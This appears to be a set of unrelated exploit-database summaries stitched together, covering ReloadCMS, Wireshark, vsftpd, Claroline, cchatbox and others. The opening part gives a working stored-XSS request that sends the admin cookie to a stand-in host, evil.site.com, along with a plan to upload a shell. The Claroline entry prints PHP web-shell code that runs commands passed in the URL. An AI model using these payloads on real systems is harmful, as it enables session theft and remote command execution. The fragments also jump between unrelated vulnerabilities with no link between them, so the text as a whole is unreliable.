ReloadCMS does not properly sanitize the User-Agent request header before storing it in the stats.dat file. Example of an attack, through netcat:
rgod>nc target.host.com 80
GET /path_to_reloadcms/ HTTP/1.0
User-Agent: "><script>window.open("http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL);window.close();</script>
Host: target.host.com
Connection: Close
So, when the admin views the site statistics through the administration panel, the JavaScript will run. Once the grab.php script captures the admin cookie, the script itself can upload a shell through the file manager, launch commands and write the output to a logfile. Also, the cookie contains the admin's MD5 password hash.
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT, and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small number of characters (4) to the command line on Windows.
The LWRES dissector in Wireshark versions 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
This exploit allows an attacker to include local files on the target system
The text describes two vulnerabilities in the MySms v1.0 application. The first vulnerability is an Authentication Bypass, which allows an attacker to bypass authentication by using a specific input. The second vulnerability is Cross-Site Request Forgery (CSRF), which allows an attacker to perform unauthorized actions on behalf of a user.
This is a proof-of-concept code for exploiting the CVE-2011-0762 vulnerability in vsftpd. The vulnerability allows remote attackers to cause a denial of service (DoS) by sending a specially crafted command to the FTP server. The affected version is 2.3.2, and the fix is available in version 2.3.4.
This vulnerability allows an attacker to execute arbitrary commands on the target system. The vulnerability exists in the "scormExport.inc.php" file of Claroline version 1.7.4 and below. By exploiting this vulnerability, an attacker can execute commands with the privileges of the web server. This vulnerability requires the target server to have the "register_globals" and "allow_url_fopen" settings enabled. The attacker needs to provide the target server IP/hostname, the path to Claroline, and an arbitrary location with the code to include. Optional parameters such as port and proxy can also be specified. The exploit works by including a remote location that contains malicious code. The remote location should contain either "lib/fileUpload.lib.php/index.html" or "lib/pclzip/pclzip.lib.php/index.html", which should have the following code: if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);} error_reporting(0); ini_set("max_execution_time",0); echo "*delim*"; passthru($_GET[cmd]); echo "*delim*"; die;
This Perl script is an exploit for the cchatbox portal that allows SQL injection. It is designed to retrieve information from the database, including the MySQL version, data directory, user, and database. It also retrieves user information such as ID, group, username, password, salt, and email.
This exploit takes advantage of an integer truncation vulnerability in MS Windows XP. It allows an attacker to execute arbitrary code with kernel privileges.
PHP Exif extension for 64bit platforms is affected by a casting vulnerability that occurs during the image header parsing. According to our preliminary analysis, exploitation of this flaw results in Denial of Service.